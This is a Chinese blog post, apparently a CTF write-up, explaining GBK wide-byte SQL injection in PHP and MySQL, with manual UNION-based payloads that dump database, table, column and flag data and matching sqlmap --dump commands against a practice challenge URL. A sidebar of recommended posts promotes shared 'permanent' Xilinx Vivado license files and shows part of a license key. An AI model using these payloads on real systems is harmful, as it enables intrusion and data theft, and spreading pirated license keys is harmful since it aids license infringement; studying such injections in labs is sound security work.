宽字节注入

最新推荐文章于 2025-04-04 23:39:01 发布
最新推荐文章于 2025-04-04 23:39:01 发布
阅读量1.8w 收藏 35
点赞数 11
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/heiseweiye/article/details/82723478
版权

GBK注射

宽字节注入

**

在使用PHP连接MySQL的时候,当设置“set
character_set_client = gbk”时会导致一个编码转换的问题,也就是我们熟悉的宽字节注入,当存在宽字节注入的时候,注入参数里带入% DF%27,即可把(%5C)吃掉,举个例子。

**

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1

当提交

id=1' and 1=1%23

时,MySQL的运行的SQL语句为

select * from user where  id ='1\' and 1=1#'

很明显这是没有注入成功的,而当我们提交

id=1%df' and 1=1%23

MySQL的运行的SQL语句为

select * from user where id ='1運' and 1=1#'

我们这里的宽字节注入是利用的MySQL的一个特性,MySQL的在使用GBK编码的时候,会认为两个字符是一个汉字(前一个ASCII码要大于128,才到汉字的范围)。这就是MySQL的的特性,因为GBK是多字节编码,他认为两个字节代表一个汉字,所以%DF和后面的\也就是%5c中变成了一个汉字“运”,而“逃逸了出来。

我用了手工注入和SqlMap的工具注入,先讲一下手工注入吧

1.手工注入

接着上面的,我们继续进行注入

id=%df%27%20union%20select%201,%20database()%23

这里写图片描述
爆出数据库之后,我们继续进行注入,爆出表

id=%df%27 union select 1,group_concat(table_name)from information_schema.tables where table_schema=database()%23

这里写图片描述

接下来我们就一个试一下每一个表,在这里我就省略了哈,直接给你们看一下爆出ctf4中表的内容的过程

下面是我第一次爆表的语句

id=%df%27 union select 1,group_concat(column_name)from information_schema.columns where table_name=ctf4%23

**没想到报错了,想了很长时间,难道还是过滤字符\搞得鬼?试着把字符转换成十六进制?ctf4转16进制为0x63746634,转换网址
将ctf4转换之后再进行注入**

id=%df' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x63746634%23

这里写图片描述

爆出了两列,下面在获取flag的内容

id=%df%27 union select 1,group_concat(flag) from ctf4%23

这里写图片描述
不出错这个应该就是了吧

2.工具注入

**注入工具我直接放过程状语从句:查询查询结果了啊
爆出当前数据库**

sqlmap.py -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df' --current-db

这里写图片描述

爆出此数据库下的所有表

sqlmap.py -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df' -T sae-chinalover --tables

这里写图片描述

爆出ctf4下面的所有列

sqlmap.py -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df' -T sae-chinalover -T ctf4 --columns

这里写图片描述

爆出旗中的内容

sqlmap.py -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df' -T sae-chinalover -T ctf4 -C flag --dump

这里写图片描述
获取成功哈

xilinx Vivado 永久license
oJVnLtjtHu的博客
01-17 5717
幸运的是,有一个令人兴奋的消息:xilinx Vivado 的永久许可证现在可用,而且可以在2037年之前的任何版本上使用,并且使用并不受限于特定的计算机设备。在这些信息中,有时候会提到一些共享的许可证文件或者注册码,通过使用这些文件或者码,就能够获得永久的xilinx Vivado许可证。但幸运的是,有一些途径可以获得这个许可证,而且还是完全免费的。对于许多开发人员和工程师来说,获得永久许可证是一件非常重要的事情,因为这意味着他们可以无需担心在未来的版本更新中的许可问题,以及不受计算机设备的限制。
Vivado lisence(2017.1版本,截至2018.3版本亲测可用)
02-15
Vivado lisence(2017.1版本,截至2018.3版本亲测可用),实验室用的lisence,支持部分高级功能
vivado license
12-23
本人亲测可用。(注意:修改license文件之后,必须重启电脑才能用)
xilinx Vivado 永久license,2037年之前的版本都可以使用,不限电脑
01-08
xilinx Vivado 永久license,2037年之前的版本都可以使用,不限电脑
vivado2022.2下载安装
最新发布
Hason866的博客
04-04 545
vivado2022.2下载安装
Vivado license 永久
04-07
2018.3测试可用,各种IP超级齐全,测试了srio可用,Jesd等IP均显示正常,理论上所有版本应该都支持,大家下来看看。
vivadolicense
qq_31253859的博客
12-31 8172
INCREMENT VIVADO_HLS xilinxd 2037.05 permanent uncounted AF3E86892AA2 VENDOR_STRING=License_Type:Bought HOSTID=ANY ISSUER=“Xilinx Inc” START=19-May-2016 TS_OK INCREMENT Vivado_System_Edition xilinxd 2037.05 permanent uncounted A1074C37F742 VENDOR_STRING=Li
必看干货 | 学习Vivado如何获取License
太阳岭,仙姑洞,雷公坡,狐狸湾
07-20 3万+
学习Vivado如何获取License Vivado入门必看 导读 老铁,还在为如何获取Vivado License而扎心?无论此刻你是一个需要安装Xilinx Vivado工具链的入门菜鸟,还是已有license过期的Vivado老铁,今儿咱就借着这篇文章,把学习「Vivado如何获取License」这档子事儿给说通透咯~ 手把手教程,分四部分讲述: ● Part 1
vivado license官方申请
星旭的博客
08-01 1839
1、选择 Generate a License Key。3、搜索license,输入MAC地址即可。vivado license官方申请。2、输入个人基本信息。
xilinx 账户申请以及vivado 安装
热门推荐
sheng__jun的博客
03-08 4万+
老铁,还在为如何获取Vivado License而扎心?无论此刻你是一个需要安装Xilinx Vivado工具链的入门菜鸟,还是已有license过期的Vivado老铁,今儿咱就借着这篇文章,把学习「Vivado如何获取License」这档子事儿给说通透咯~ 手把手教程,分三部分讲述。码字不易,若是喜欢这篇文章,记得转给身边有需要的朋友们哦!● Part 1:如何注册Xilinx官网账号与Lice...
vivado许可证官网获取方法
qq_43510439的博客
11-28 5002
获取许可证”
vivado license申请
Y__Yshans的博客
01-05 1264
AMD: Product Licensing
vivado软件的安装教程以及license
12-21
vivado软件的安装教程以及license
vivado License 许可证导入
07-03
vivado License 许可证导入,包括HLS、AccelDSP、System Generator、软硬CPU、SOC、嵌入式Linux都可以用 点击菜单栏【Help】,选择【Manage License...】 点击左侧【Get Licence】下的【Load License】 点击右侧的【Copy License...】,选择许可证文件进行加载
2017年最新vivadolicense
11-22
2017年最新vivadolicense,测试可用,拿去不谢~ 2017年最新vivadolicense,测试可用,拿去不谢~
VIVADO 2018.1 license 亲测可用
05-08
VIVADO 2018.1 license 亲测可用 官方2018.1最新版 需要的自取
vivadolicense通用版
02-25
vivado2018版本亲测可用,其他版本也是可以通用的,打开“Manage Xilinx License”,在左侧栏中选择“Load License”,然后在右侧选择“Copy License”。添加license就可以了。
vivado_license
11-23
在标题"vivado_license"中,我们关注的是Vivado的授权问题。Xilinx的软件通常需要有效的许可证才能运行,这些许可证通常以特定的文件格式存在,如".lic"文件。"xilinx_license.lic"就是这样的一个文件,它包含了允许...
vivado 2015 license
12-26
这个“vivado 2015 license”文件对于使用Vivado 2015进行FPGA设计的学生来说至关重要,因为它允许用户在指定的期限内免费或有权限地使用该软件。 在FPGA设计领域,Vivado是一款功能强大的开发环境,它涵盖了从高...
vivado2023 license
11-16
Vivado2023是一款集成开发环境软件,用于设计和验证FPGA(现场可编程门阵列)和可编程逻辑器件。对于使用Vivado2023的用户来说,license是必不可少的。 Vivado2023的license是一种许可证,用于授权用户合法使用该软件。许可证分为多种类型,包括评估许可证、开发许可证和节点许可证等。每种许可证都有不同的使用条件和功能。 评估许可证是免费提供的,让用户可以在一段时间内试用Vivado2023的全部功能。用户可以使用这个许可证来了解软件的性能和特点,对于初学者和小规模项目来说是一个很好的选择。但是,使用评估许可证的用户在使用期限过后需要购买正式的许可证才能继续使用软件。 开发许可证是付费的,可以永久使用Vivado2023的全部功能。这种许可证适用于需要长期使用Vivado2023进行开发的用户,通常是专业的FPGA设计师或工程师。购买开发许可证可以享受Vivado2023的技术支持和更新服务,确保软件始终保持最新的版本和功能。 节点许可证是用于多设备或分布式设计的许可证,可以在多个计算机上安装Vivado2023,并共享使用。节点许可证适用于大规模项目或需要多个处理节点进行设计的用户,可以提高工作效率和资源利用率。 总之,Vivado2023 license是用户在使用Vivado2023时必须考虑的问题。用户可以根据自己的需求选择合适的许可证类型,以便获取最佳的软件使用体验。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值